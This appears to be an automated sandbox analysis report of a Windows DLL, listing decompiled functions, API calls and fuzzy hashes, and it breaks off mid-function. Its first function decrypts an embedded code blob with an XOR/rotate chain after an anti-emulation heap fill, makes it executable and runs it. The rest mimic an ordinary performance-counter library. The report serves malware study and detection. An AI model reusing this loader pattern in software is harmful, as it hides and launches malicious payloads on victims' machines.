                Function 6FF73070, Relevance: 6.2, APIs: 4, Instructions: 176memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E6FF73070() {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				long _v20;
				void* _t117;

				_v16 = _v16 & 0x00000000;
				_t117 = RtlAllocateHeap(GetProcessHeap(), 1, 0xbebc200); // executed
				_v16 = _t117;
				if(_v16 != 0) {
					memset(_v16, 0xde, 0xbebc200);
					_v12 = _v12 & 0x00000000;
					_v12 = _v12 & 0x00000000;
					while(_v12 < 0x1547) {
						_t14 =  &E6FF750D8 + _v12; // 0x0
						_v5 =  *_t14;
						_v5 = _v5 & 0x000000ff ^ 0x00000071;
						_v5 = (_v5 & 0x000000ff) - 8;
						_v5 = _v5 & 0x000000ff ^ 0x00000083;
						_v5 = (_v5 & 0x000000ff) + 0x3b;
						_v5 = (_v5 & 0x000000ff) >> 0x00000001 | (_v5 & 0x000000ff) << 0x00000007;
						_v5 = (_v5 & 0x000000ff) - 0xcd;
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) + 0x72;
						_v5 = _v5 & 0x000000ff ^ 0x00000091;
						_v5 = (_v5 & 0x000000ff) - _v12;
						_v5 = _v5 & 0x000000ff ^ _v12;
						_v5 = (_v5 & 0x000000ff) >> 0x00000003 | (_v5 & 0x000000ff) << 0x00000005;
						_v5 = (_v5 & 0x000000ff) + _v12;
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) + 0x51;
						_v5 = _v5 & 0x000000ff ^ _v12;
						_v5 = (_v5 & 0x000000ff) - _v12;
						_v5 = _v5 & 0x000000ff ^ _v12;
						_v5 = (_v5 & 0x000000ff) - 0xa9;
						_v5 = (_v5 & 0x000000ff) >> 0x00000001 | (_v5 & 0x000000ff) << 0x00000007;
						_v5 = (_v5 & 0x000000ff) - _v12;
						_v5 = _v5 & 0x000000ff ^ _v12;
						_v5 =  !(_v5 & 0x000000ff);
						_v5 = _v5 & 0x000000ff ^ 0x00000078;
						_v5 = (_v5 & 0x000000ff) + _v12;
						_v5 = (_v5 & 0x000000ff) >> 0x00000003 | (_v5 & 0x000000ff) << 0x00000005;
						_v5 = _v5 & 0x000000ff ^ _v12;
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 = _v5 & 0x000000ff ^ 0x00000034;
						_v5 =  !(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) >> 0x00000001 | (_v5 & 0x000000ff) << 0x00000007;
						_v5 = (_v5 & 0x000000ff) + _v12;
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 =  !(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) - 0x81;
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) + 0x47;
						_v5 =  !(_v5 & 0x000000ff);
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) - 0xd2;
						 *((char*)( &E6FF750D8 + _v12)) = _v5;
						_v12 = _v12 + 1;
					}
					VirtualProtect( &E6FF750D8, 0x1547, 0x40,  &_v20); // executed
					E6FF750D8(); // executed
				}
				return 0;
			}








                0x6ff73076
                0x6ff73088
                0x6ff7308e
                0x6ff73095
                0x6ff730a8
                0x6ff730b0
                0x6ff730b4
                0x6ff730c1
                0x6ff730d1
                0x6ff730d7
                0x6ff730e1
                0x6ff730eb
                0x6ff730f7
                0x6ff73101
                0x6ff73113
                0x6ff7311f
                0x6ff73128
                0x6ff73132
                0x6ff7313e
                0x6ff73148
                0x6ff73152
                0x6ff73165
                0x6ff7316f
                0x6ff73178
                0x6ff73182
                0x6ff7318c
                0x6ff73196
                0x6ff731a0
                0x6ff731ac
                0x6ff731be
                0x6ff731c8
                0x6ff731d2
                0x6ff731db
                0x6ff731e5
                0x6ff731ef
                0x6ff73202
                0x6ff7320c
                0x6ff73215
                0x6ff7321f
                0x6ff73228
                0x6ff7323a
                0x6ff73244
                0x6ff7324d
                0x6ff73256
                0x6ff73262
                0x6ff7326b
                0x6ff73275
                0x6ff7327e
                0x6ff73287
                0x6ff73293
                0x6ff7329c
                0x6ff730be
                0x6ff730be
                0x6ff732b7
                0x6ff732c2
                0x6ff732c2
                0x6ff732c9

                APIs
                • GetProcessHeap.KERNEL32(00000001,0BEBC200), ref: 6FF73081
                • RtlAllocateHeap.NTDLL(00000000), ref: 6FF73088
                • memset.MSVCRT ref: 6FF730A8
                • VirtualProtect.KERNELBASE(6FF750D8,00001547,00000040,?), ref: 6FF732B7
                Memory Dump Source
                • Source File: 0000000C.00000002.300875574.000000006FF71000.00000020.00020000.sdmp, Offset: 6FF70000, based on PE: true
                • Associated: 0000000C.00000002.300864035.000000006FF70000.00000002.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300897654.000000006FF74000.00000002.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300925253.000000006FF75000.00000040.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300940311.000000006FF77000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Heap$AllocateProcessProtectVirtualmemset
                • String ID:
                • API String ID: 173993298-0
                • Opcode ID: f51d2a631e7bca30a2d835e9632401615f4a619c0b688a6741397b4fd8ab1332
                • Instruction ID: 7391e8b3f5c3fc4fc5f5d9a3c948a99f857b4543e1b036cc49bcbb7da37e8441
                • Opcode Fuzzy Hash: f51d2a631e7bca30a2d835e9632401615f4a619c0b688a6741397b4fd8ab1332
                • Instruction Fuzzy Hash: 3C815421C5D2E9BDDB02CBF944157FCBFB05E26112F0841D6E4E4A6283C53A938EDB21
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                Function 6FF72880, Relevance: 36.9, APIs: 17, Strings: 4, Instructions: 119synchronizationthreadCOMMON
                Download Yara Rule
                C-Code - Quality: 86%
                			E6FF72880(void* _a4, signed int _a8, intOrPtr _a12) {
				void* _v8;
				long _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				intOrPtr _t45;

				_v8 = _a4;
				_t45 = _a4;
				0x6ff70000("%p %d %p\n", _t45, _a8, _a12);
				EnterCriticalSection(0x6ff750ac);
				if(_v8 == 0 ||  *_v8 != 0x50444830) {
					LeaveCriticalSection(0x6ff750ac);
					return 0xc0000bbc;
				} else {
					0x6ff70000(0);
					if(_t45 == 0) {
						if( *(_v8 + 8) == 0) {
							_v16 = CreateEventW(0, 0, 0, 0);
							 *(_v8 + 0x14) = _v16;
							if(_v16 != 0) {
								L11:
								 *((intOrPtr*)(_v8 + 0x10)) = _a12;
								 *(_v8 + 0xc) = _a8 * 0x3e8;
								_v20 = CreateThread(0, 0, E6FF72EC0, _v8, 0, 0);
								 *(_v8 + 8) = _v20;
								if(_v20 != 0) {
									LeaveCriticalSection(0x6ff750ac);
									return 0;
								}
								_v12 = GetLastError();
								CloseHandle( *(_v8 + 0x14));
								LeaveCriticalSection(0x6ff750ac);
								return _v12;
							}
							_v12 = GetLastError();
							LeaveCriticalSection(0x6ff750ac);
							return _v12;
						}
						_v24 =  *(_v8 + 8);
						SetEvent( *(_v8 + 0x14));
						LeaveCriticalSection(0x6ff750ac);
						WaitForSingleObject(_v24, 0xffffffff);
						EnterCriticalSection(0x6ff750ac);
						if( *_v8 == 0x50444830) {
							CloseHandle( *(_v8 + 8));
							 *(_v8 + 8) = 0;
							goto L11;
						}
						LeaveCriticalSection(0x6ff750ac);
						return 0xc0000bbc;
					}
					LeaveCriticalSection(0x6ff750ac);
					return 0x800007d5;
				}
			}









                0x6ff72889
                0x6ff72894
                0x6ff7289d
                0x6ff728aa
                0x6ff728b4
                0x6ff728c6
                0x00000000
                0x6ff728d6
                0x6ff728d8
                0x6ff728e2
                0x6ff72900
                0x6ff72981
                0x6ff7298a
                0x6ff72991
                0x6ff729ac
                0x6ff729b2
                0x6ff729bf
                0x6ff729d9
                0x6ff729e2
                0x6ff729e9
                0x6ff72a16
                0x00000000
                0x6ff72a1c
                0x6ff729f1
                0x6ff729fb
                0x6ff72a06
                0x00000000
                0x6ff72a0c
                0x6ff72999
                0x6ff729a1
                0x00000000
                0x6ff729a7
                0x6ff72908
                0x6ff72912
                0x6ff7291d
                0x6ff72929
                0x6ff72934
                0x6ff72943
                0x6ff72961
                0x6ff7296a
                0x00000000
                0x6ff7296a
                0x6ff7294a
                0x00000000
                0x6ff72950
                0x6ff728e9
                0x00000000
                0x6ff728ef

                APIs
                • EnterCriticalSection.KERNEL32(6FF750AC), ref: 6FF728AA
                • LeaveCriticalSection.KERNEL32(6FF750AC), ref: 6FF728C6
                • LeaveCriticalSection.KERNEL32(6FF750AC), ref: 6FF728E9
                • SetEvent.KERNEL32(?), ref: 6FF72912
                • LeaveCriticalSection.KERNEL32(6FF750AC), ref: 6FF7291D
                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6FF72929
                • EnterCriticalSection.KERNEL32(6FF750AC), ref: 6FF72934
                • LeaveCriticalSection.KERNEL32(6FF750AC), ref: 6FF7294A
                • CloseHandle.KERNEL32(?), ref: 6FF72961
                • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 6FF7297B
                • GetLastError.KERNEL32 ref: 6FF72993
                • LeaveCriticalSection.KERNEL32(6FF750AC), ref: 6FF729A1
                • CreateThread.KERNEL32 ref: 6FF729D3
                • GetLastError.KERNEL32 ref: 6FF729EB
                • CloseHandle.KERNEL32(?), ref: 6FF729FB
                • LeaveCriticalSection.KERNEL32(6FF750AC), ref: 6FF72A06
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.300875574.000000006FF71000.00000020.00020000.sdmp, Offset: 6FF70000, based on PE: true
                • Associated: 0000000C.00000002.300864035.000000006FF70000.00000002.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300897654.000000006FF74000.00000002.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300925253.000000006FF75000.00000040.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300940311.000000006FF77000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CriticalSection$Leave$CloseCreateEnterErrorEventHandleLast$ObjectSingleThreadWait
                • String ID: %p %d %p$0HDP$0HDP$p-w
                • API String ID: 2526439713-1736687199
                • Opcode ID: f339c943d84bc593835a4299690b727b12c1ea08e874e29b9021887f82822e2f
                • Instruction ID: fe5906ea2a6b43d669ab92dd20fb696f4b3447015c221731353f6a9a5333b492
                • Opcode Fuzzy Hash: f339c943d84bc593835a4299690b727b12c1ea08e874e29b9021887f82822e2f
                • Instruction Fuzzy Hash: 71510775950208EFDB24DF98EA48B5DFBB1BF09311F20419AF905AB390CB71AA40CF51
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF71EA0, Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 142stringCOMMON
                Download Yara Rule
                C-Code - Quality: 74%
                			E6FF71EA0(WCHAR** _a4, WCHAR* _a8, intOrPtr* _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				short _v36;
				short _v2084;
				int _t80;
				void* _t122;
				void* _t123;
				void* _t124;

				_v12 = 0;
				0x6ff70000("%p %p %p 0x%08x\n", _a4, _a8, _a12, _a16);
				_t124 = _t123 + 0x14;
				if(_a16 != 0) {
					0x6ff70000("unimplemented flags 0x%08x\n", _a16);
					_t124 = _t124 + 8;
				}
				if(_a4 == 0 || _a4[5] == 0 || _a4[1] == 0 || _a12 == 0) {
					return 0xc0000bbd;
				} else {
					 *((short*)(_t122 + 0xfffffffffffff7e0)) = 0;
					if( *_a4 != 0) {
						lstrcatW( &_v2084, 0x6ff76944);
						lstrcatW( &_v2084,  *_a4);
					}
					lstrcatW( &_v2084, 0x6ff7694c);
					lstrcatW( &_v2084, _a4[1]);
					if(_a4[2] != 0) {
						lstrcatW( &_v2084, 0x6ff76950);
						if(_a4[3] != 0) {
							lstrcatW( &_v2084, _a4[3]);
							lstrcatW( &_v2084, 0x6ff76954);
						}
						lstrcatW( &_v2084, _a4[2]);
						_t80 = _a4[4];
						0x6ff70000( &_v36, "#%u", _t80);
						swprintf( &_v36, _t80);
						lstrcatW( &_v2084,  &_v36);
						lstrcatW( &_v2084, 0x6ff76960);
					}
					lstrcatW( &_v2084, 0x6ff76964);
					lstrcatW( &_v2084, _a4[5]);
					_v8 = lstrlenW( &_v2084) + 1;
					if( *_a12 < _v8) {
						_v12 = 0x800007d2;
					} else {
						lstrcpyW(_a8,  &_v2084);
					}
					 *_a12 = _v8;
					return _v12;
				}
			}











                0x6ff71ea9
                0x6ff71ec5
                0x6ff71eca
                0x6ff71ed1
                0x6ff71edc
                0x6ff71ee1
                0x6ff71ee1
                0x6ff71ee8
                0x00000000
                0x6ff71f0c
                0x6ff71f16
                0x6ff71f24
                0x6ff71f32
                0x6ff71f45
                0x6ff71f45
                0x6ff71f57
                0x6ff71f6b
                0x6ff71f78
                0x6ff71f8a
                0x6ff71f97
                0x6ff71fa7
                0x6ff71fb9
                0x6ff71fb9
                0x6ff71fcd
                0x6ff71fd6
                0x6ff71fe3
                0x6ff71ff0
                0x6ff72003
                0x6ff72015
                0x6ff72015
                0x6ff72027
                0x6ff7203b
                0x6ff72051
                0x6ff7205c
                0x6ff72071
                0x6ff7205e
                0x6ff72069
                0x6ff72069
                0x6ff7207e
                0x00000000
                0x6ff72080

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.300875574.000000006FF71000.00000020.00020000.sdmp, Offset: 6FF70000, based on PE: true
                • Associated: 0000000C.00000002.300864035.000000006FF70000.00000002.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300897654.000000006FF74000.00000002.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300925253.000000006FF75000.00000040.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300940311.000000006FF77000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: lstrcat$lstrcpylstrlenswprintf
                • String ID: #%u$%p %p %p 0x%08x$unimplemented flags 0x%08x
                • API String ID: 332791676-533629115
                • Opcode ID: 0cc91502c72288172ed663634719baae05c468c6ad30f643118b9276cfd768e4
                • Instruction ID: 358dd43f9db71d710b2dc852f53492b3bb8d1ac802c3ee4455510397a42428df
                • Opcode Fuzzy Hash: 0cc91502c72288172ed663634719baae05c468c6ad30f643118b9276cfd768e4
                • Instruction Fuzzy Hash: A4512A75500208EBCB14DF90E884FEAB7B9FF49310F14858AF91597241DB36EA98CFA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF717D0, Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 66synchronizationCOMMON
                Download Yara Rule
                C-Code - Quality: 89%
                			E6FF717D0(intOrPtr* _a4) {
				intOrPtr* _v8;
				void* _v12;

				_v8 = _a4;
				0x6ff70000("%p\n", _a4);
				EnterCriticalSection(0x6ff750ac);
				if(_v8 == 0 ||  *_v8 != 0x50444830) {
					LeaveCriticalSection(0x6ff750ac);
					return 0xc0000bbc;
				} else {
					if( *(_v8 + 8) == 0) {
						L7:
						E6FF72C70(_v8);
						LeaveCriticalSection(0x6ff750ac);
						return 0;
					}
					_v12 =  *(_v8 + 8);
					SetEvent( *(_v8 + 0x14));
					LeaveCriticalSection(0x6ff750ac);
					WaitForSingleObject(_v12, 0xffffffff);
					EnterCriticalSection(0x6ff750ac);
					if( *_v8 == 0x50444830) {
						CloseHandle( *(_v8 + 0x14));
						CloseHandle( *(_v8 + 8));
						 *(_v8 + 8) = 0;
						goto L7;
					}
					LeaveCriticalSection(0x6ff750ac);
					return 0;
				}
			}





                0x6ff717d9
                0x6ff717e5
                0x6ff717f2
                0x6ff717fc
                0x6ff7180e
                0x00000000
                0x6ff7181e
                0x6ff71825
                0x6ff7189d
                0x6ff718a1
                0x6ff718ae
                0x00000000
                0x6ff718b4
                0x6ff7182d
                0x6ff71837
                0x6ff71842
                0x6ff7184e
                0x6ff71859
                0x6ff71868
                0x6ff71880
                0x6ff7188d
                0x6ff71896
                0x00000000
                0x6ff71896
                0x6ff7186f
                0x00000000
                0x6ff71875

                APIs
                • EnterCriticalSection.KERNEL32(6FF750AC), ref: 6FF717F2
                • LeaveCriticalSection.KERNEL32(6FF750AC), ref: 6FF7180E
                • SetEvent.KERNEL32(?), ref: 6FF71837
                • LeaveCriticalSection.KERNEL32(6FF750AC), ref: 6FF71842
                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 6FF7184E
                • EnterCriticalSection.KERNEL32(6FF750AC), ref: 6FF71859
                • LeaveCriticalSection.KERNEL32(6FF750AC), ref: 6FF7186F
                • CloseHandle.KERNEL32(?), ref: 6FF71880
                • CloseHandle.KERNEL32(?), ref: 6FF7188D
                • LeaveCriticalSection.KERNEL32(6FF750AC), ref: 6FF718AE
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.300875574.000000006FF71000.00000020.00020000.sdmp, Offset: 6FF70000, based on PE: true
                • Associated: 0000000C.00000002.300864035.000000006FF70000.00000002.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300897654.000000006FF74000.00000002.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300925253.000000006FF75000.00000040.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300940311.000000006FF77000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CriticalSection$Leave$CloseEnterHandle$EventObjectSingleWait
                • String ID: %p$0HDP$0HDP$p-w
                • API String ID: 549566651-945182506
                • Opcode ID: 0c789396a99629f45a1f7fe01d3dcb9a38740a78c1cb1b1bfb17d064800a902b
                • Instruction ID: 0723511f11f83e233c220150a1d776c4e500f6ae2dc612a246c6c029e7b7ead4
                • Opcode Fuzzy Hash: 0c789396a99629f45a1f7fe01d3dcb9a38740a78c1cb1b1bfb17d064800a902b
                • Instruction Fuzzy Hash: D3213935910108EBCB14DFA4F948A9DFBB1BF49311F20829AF50197350DB31AE50CB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF72EC0, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 46threadsynchronizationCOMMON
                Download Yara Rule
                C-Code - Quality: 92%
                			E6FF72EC0(intOrPtr* _a4) {
				intOrPtr* _v8;
				long _v12;
				void* _v16;
				void* _t29;

				_v8 = _a4;
				_v12 =  *((intOrPtr*)(_v8 + 0xc));
				_v16 =  *((intOrPtr*)(_v8 + 0x14));
				while(WaitForSingleObject(_v16, _v12) == 0x102) {
					EnterCriticalSection(0x6ff750ac);
					if( *_v8 == 0x50444830) {
						_push(_v8);
						E6FF72EB0(_t18);
						_t29 = _t29 + 4;
						if(SetEvent( *(_v8 + 0x10)) != 0) {
							LeaveCriticalSection(0x6ff750ac);
							continue;
						}
						LeaveCriticalSection(0x6ff750ac);
						ExitThread(0);
					}
					LeaveCriticalSection(0x6ff750ac);
					ExitThread(0xc0000bbc);
				}
				ExitThread(0);
			}







                0x6ff72ec9
                0x6ff72ed2
                0x6ff72edb
                0x6ff72ede
                0x6ff72f00
                0x6ff72f0f
                0x6ff72f2a
                0x6ff72f2b
                0x6ff72f30
                0x6ff72f42
                0x6ff72f5c
                0x00000000
                0x6ff72f5c
                0x6ff72f49
                0x6ff72f51
                0x6ff72f51
                0x6ff72f16
                0x6ff72f21
                0x6ff72f21
                0x6ff72ef5

                APIs
                • WaitForSingleObject.KERNEL32(?,?), ref: 6FF72EE6
                • ExitThread.KERNEL32 ref: 6FF72EF5
                • EnterCriticalSection.KERNEL32(6FF750AC), ref: 6FF72F00
                • LeaveCriticalSection.KERNEL32(6FF750AC), ref: 6FF72F16
                • ExitThread.KERNEL32 ref: 6FF72F21
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.300875574.000000006FF71000.00000020.00020000.sdmp, Offset: 6FF70000, based on PE: true
                • Associated: 0000000C.00000002.300864035.000000006FF70000.00000002.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300897654.000000006FF74000.00000002.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300925253.000000006FF75000.00000040.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300940311.000000006FF77000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CriticalExitSectionThread$EnterLeaveObjectSingleWait
                • String ID: 0HDP$p-w
                • API String ID: 1874301155-3830501846
                • Opcode ID: acb5e2b54ec20a9023129e59ec3d7c7289654634acd05ce324c26f7b9329ebd4
                • Instruction ID: 7aa21667d2f8f4b29790f5caba968453889500a665d95f99f078ebaa81af06fc
                • Opcode Fuzzy Hash: acb5e2b54ec20a9023129e59ec3d7c7289654634acd05ce324c26f7b9329ebd4
                • Instruction Fuzzy Hash: A611037AA10608EBCB14DBE8E948E8DFBB1BF49311F21809DE50597350DB31AA50CB51
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF71C40, Relevance: 13.6, APIs: 6, Strings: 3, Instructions: 80COMMON
                Download Yara Rule
                C-Code - Quality: 82%
                			E6FF71C40(void* __ecx, intOrPtr* _a4, signed char _a8, int* _a12, void* _a16) {
				intOrPtr* _v8;

				_v8 = _a4;
				0x6ff70000("%p %d %p %p\n", _a4, _a8 & 0x000000ff, _a12, _a16, __ecx);
				EnterCriticalSection(0x6ff750ac);
				if(_v8 == 0 ||  *_v8 != 0x50444831) {
					LeaveCriticalSection(0x6ff750ac);
					return 0xc0000bbc;
				} else {
					if(_a12 != 0) {
						if( *_a12 >= 0x48) {
							memset(_a16, 0, 0x48);
							 *((intOrPtr*)(_a16 + 4)) =  *((intOrPtr*)(_v8 + 8));
							 *((intOrPtr*)(_a16 + 0xc)) =  *((intOrPtr*)(_v8 + 0xc));
							 *((intOrPtr*)(_a16 + 0x10)) =  *((intOrPtr*)(_v8 + 0x10));
							 *((intOrPtr*)(_a16 + 0x14)) =  *((intOrPtr*)(_v8 + 0x14));
							 *((intOrPtr*)(_a16 + 0x18)) =  *((intOrPtr*)(_v8 + 0x18));
							 *((intOrPtr*)(_a16 + 0x1c)) =  *((intOrPtr*)(_v8 + 0x1c));
							 *_a12 = 0x48;
							LeaveCriticalSection(0x6ff750ac);
							return 0;
						}
						 *_a12 = 0x48;
						LeaveCriticalSection(0x6ff750ac);
						return 0x800007d2;
					}
					LeaveCriticalSection(0x6ff750ac);
					return 0xc0000bbd;
				}
			}




                0x6ff71c47
                0x6ff71c60
                0x6ff71c6d
                0x6ff71c77
                0x6ff71c89
                0x00000000
                0x6ff71c99
                0x6ff71c9d
                0x6ff71cba
                0x6ff71cdf
                0x6ff71cf0
                0x6ff71cfc
                0x6ff71d08
                0x6ff71d14
                0x6ff71d20
                0x6ff71d2c
                0x6ff71d32
                0x6ff71d3d
                0x00000000
                0x6ff71d43
                0x6ff71cbf
                0x6ff71cca
                0x00000000
                0x6ff71cd0
                0x6ff71ca4
                0x00000000
                0x6ff71caa

                APIs
                • EnterCriticalSection.KERNEL32(6FF750AC), ref: 6FF71C6D
                • LeaveCriticalSection.KERNEL32(6FF750AC), ref: 6FF71C89
                • LeaveCriticalSection.KERNEL32(6FF750AC), ref: 6FF71CA4
                • LeaveCriticalSection.KERNEL32(6FF750AC), ref: 6FF71CCA
                • memset.MSVCRT ref: 6FF71CDF
                • LeaveCriticalSection.KERNEL32(6FF750AC), ref: 6FF71D3D
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.300875574.000000006FF71000.00000020.00020000.sdmp, Offset: 6FF70000, based on PE: true
                • Associated: 0000000C.00000002.300864035.000000006FF70000.00000002.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300897654.000000006FF74000.00000002.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300925253.000000006FF75000.00000040.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300940311.000000006FF77000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CriticalSection$Leave$Entermemset
                • String ID: %p %d %p %p$1HDP$p-w
                • API String ID: 2581898777-2455463802
                • Opcode ID: f0ae423877e2f61bc68bbab3e3026defac81b35bc0d611b2b6d68b6adcc9ade0
                • Instruction ID: 361374fb966f8a7384ea8a0b856d38827730a1bc21a1f87ba288049f00756595
                • Opcode Fuzzy Hash: f0ae423877e2f61bc68bbab3e3026defac81b35bc0d611b2b6d68b6adcc9ade0
                • Instruction Fuzzy Hash: 9C31E5B5600209DFCB14CF88EA90A9AB7F1BF49314F21819AFC059B351DB35ED11CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF71B30, Relevance: 13.6, APIs: 6, Strings: 3, Instructions: 80COMMON
                Download Yara Rule
                C-Code - Quality: 82%
                			E6FF71B30(void* __ecx, intOrPtr* _a4, signed char _a8, int* _a12, void* _a16) {
				intOrPtr* _v8;

				_v8 = _a4;
				0x6ff70000("%p %d %p %p\n", _a4, _a8 & 0x000000ff, _a12, _a16, __ecx);
				EnterCriticalSection(0x6ff750ac);
				if(_v8 == 0 ||  *_v8 != 0x50444831) {
					LeaveCriticalSection(0x6ff750ac);
					return 0xc0000bbc;
				} else {
					if(_a12 != 0) {
						if( *_a12 >= 0x48) {
							memset(_a16, 0, 0x48);
							 *((intOrPtr*)(_a16 + 4)) =  *((intOrPtr*)(_v8 + 8));
							 *((intOrPtr*)(_a16 + 0xc)) =  *((intOrPtr*)(_v8 + 0xc));
							 *((intOrPtr*)(_a16 + 0x10)) =  *((intOrPtr*)(_v8 + 0x10));
							 *((intOrPtr*)(_a16 + 0x14)) =  *((intOrPtr*)(_v8 + 0x14));
							 *((intOrPtr*)(_a16 + 0x18)) =  *((intOrPtr*)(_v8 + 0x18));
							 *((intOrPtr*)(_a16 + 0x1c)) =  *((intOrPtr*)(_v8 + 0x1c));
							 *_a12 = 0x48;
							LeaveCriticalSection(0x6ff750ac);
							return 0;
						}
						 *_a12 = 0x48;
						LeaveCriticalSection(0x6ff750ac);
						return 0x800007d2;
					}
					LeaveCriticalSection(0x6ff750ac);
					return 0xc0000bbd;
				}
			}




                0x6ff71b37
                0x6ff71b50
                0x6ff71b5d
                0x6ff71b67
                0x6ff71b79
                0x00000000
                0x6ff71b89
                0x6ff71b8d
                0x6ff71baa
                0x6ff71bcf
                0x6ff71be0
                0x6ff71bec
                0x6ff71bf8
                0x6ff71c04
                0x6ff71c10
                0x6ff71c1c
                0x6ff71c22
                0x6ff71c2d
                0x00000000
                0x6ff71c33
                0x6ff71baf
                0x6ff71bba
                0x00000000
                0x6ff71bc0
                0x6ff71b94
                0x00000000
                0x6ff71b9a

                APIs
                • EnterCriticalSection.KERNEL32(6FF750AC), ref: 6FF71B5D
                • LeaveCriticalSection.KERNEL32(6FF750AC), ref: 6FF71B79
                • LeaveCriticalSection.KERNEL32(6FF750AC), ref: 6FF71B94
                • LeaveCriticalSection.KERNEL32(6FF750AC), ref: 6FF71BBA
                • memset.MSVCRT ref: 6FF71BCF
                • LeaveCriticalSection.KERNEL32(6FF750AC), ref: 6FF71C2D
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.300875574.000000006FF71000.00000020.00020000.sdmp, Offset: 6FF70000, based on PE: true
                • Associated: 0000000C.00000002.300864035.000000006FF70000.00000002.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300897654.000000006FF74000.00000002.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300925253.000000006FF75000.00000040.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300940311.000000006FF77000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CriticalSection$Leave$Entermemset
                • String ID: %p %d %p %p$1HDP$p-w
                • API String ID: 2581898777-2455463802
                • Opcode ID: b8a9a38fbfba9e1e2ccfcc73b61b1592f5cbcacaa2fe142f80172eae939db6a4
                • Instruction ID: 19c4e108cf98c087fc2282f58102342fcad4d8d8068ba9c8678d4dd3516367bb
                • Opcode Fuzzy Hash: b8a9a38fbfba9e1e2ccfcc73b61b1592f5cbcacaa2fe142f80172eae939db6a4
                • Instruction Fuzzy Hash: 6C31E5B9600209DFCB14CF98E950E9ABBF1BF49314F21819AF9059B361DB35ED11CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF71290, Relevance: 12.1, APIs: 5, Strings: 3, Instructions: 117COMMON
                Download Yara Rule
                C-Code - Quality: 65%
                			E6FF71290(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _t53;
				intOrPtr* _t56;
				intOrPtr _t67;
				signed int _t96;
				void* _t100;
				void* _t102;
				void* _t103;

				_v16 = _a4;
				_t53 = _a8;
				0x6ff70000(_t53, _a12, _a16);
				0x6ff70000("%p %s %lx %p\n", _a4, _t53);
				_t102 = _t100 + 0x18;
				if(_a8 == 0 || _a16 == 0) {
					return 0xc0000bbd;
				} else {
					EnterCriticalSection(0x6ff750ac);
					if(_v16 == 0 ||  *_v16 != 0x50444830) {
						LeaveCriticalSection(0x6ff750ac);
						return 0xc0000bbc;
					} else {
						_t56 = _a16;
						 *_t56 = 0;
						_v8 = 0;
						while(1) {
							0x6ff70000(0x6ff74170);
							_t103 = _t102 + 4;
							if(_v8 >= _t56) {
								break;
							}
							_t18 = (_v8 << 5) + 0x6ff74174; // 0x6ff76658
							_t74 =  *_t18;
							_t56 = E6FF72D50( *_t18, _a8);
							_t102 = _t103 + 8;
							if(_t56 == 0) {
								_v8 = _v8 + 1;
								continue;
							}
							_v12 = E6FF72BE0(_t56, _t74);
							if(_v12 == 0) {
								LeaveCriticalSection(0x6ff750ac);
								return 0xc0000bbb;
							}
							_t22 = (_v8 << 5) + 0x6ff74174; // 0x6ff76658
							 *((intOrPtr*)(_v12 + 4)) = E6FF72B30(_t74,  *_t22);
							_t27 = (_v8 << 5) + 0x6ff74178; // 0x6ff72c90
							 *((intOrPtr*)(_v12 + 0x30)) =  *_t27;
							_t31 = (_v8 << 5) + 0x6ff7417c; // 0x21510500
